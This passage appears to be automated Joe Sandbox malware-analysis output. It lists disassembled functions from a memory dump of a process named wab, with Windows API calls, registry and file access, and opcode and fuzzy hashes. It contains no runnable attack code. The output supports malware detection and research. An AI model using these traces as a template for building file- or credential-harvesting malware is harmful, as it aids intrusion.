                                                            • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                            • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                            • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                            • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: File$PointerRead
                                                            • String ID:
                                                            • API String ID: 3154509469-0
                                                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                                            • String ID:
                                                            • API String ID: 4232544981-0
                                                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                            • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                            • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                            • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$FileModuleName
                                                            • String ID:
                                                            • API String ID: 3859505661-0
                                                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                            • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                            • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                            • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                            • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                            • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                            • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                            • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                            • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                            • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                            • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                            • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                            • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                            • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                            • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                            • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                            • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                            • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                            • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                            • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                            • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                            • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                            • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                            • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                            • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: EnumNamesResource
                                                            • String ID:
                                                            • API String ID: 3334572018-0
                                                            • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                            • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                            • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                            • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                            • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                            • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                            • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: CloseFind
                                                            • String ID:
                                                            • API String ID: 1863332320-0
                                                            • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                            • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                            • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                            • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                            • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                            • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                            • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                            • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                            • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                            • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                            • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                            • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                            • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                            • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                            • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                            • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 004095FC
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                              • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                              • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                            • String ID:
                                                            • API String ID: 3655998216-0
                                                            • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                            • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                            • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                            • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                                            • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                            • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 00445426
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                            • String ID:
                                                            • API String ID: 1828521557-0
                                                            • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                            • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp
                                                            • String ID:
                                                            • API String ID: 2081463915-0
                                                            • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                            • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                            • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                            • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateErrorHandleLastRead
                                                            • String ID:
                                                            • API String ID: 2136311172-0
                                                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@
                                                            • String ID:
                                                            • API String ID: 1936579350-0
                                                            • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                            • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                            • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
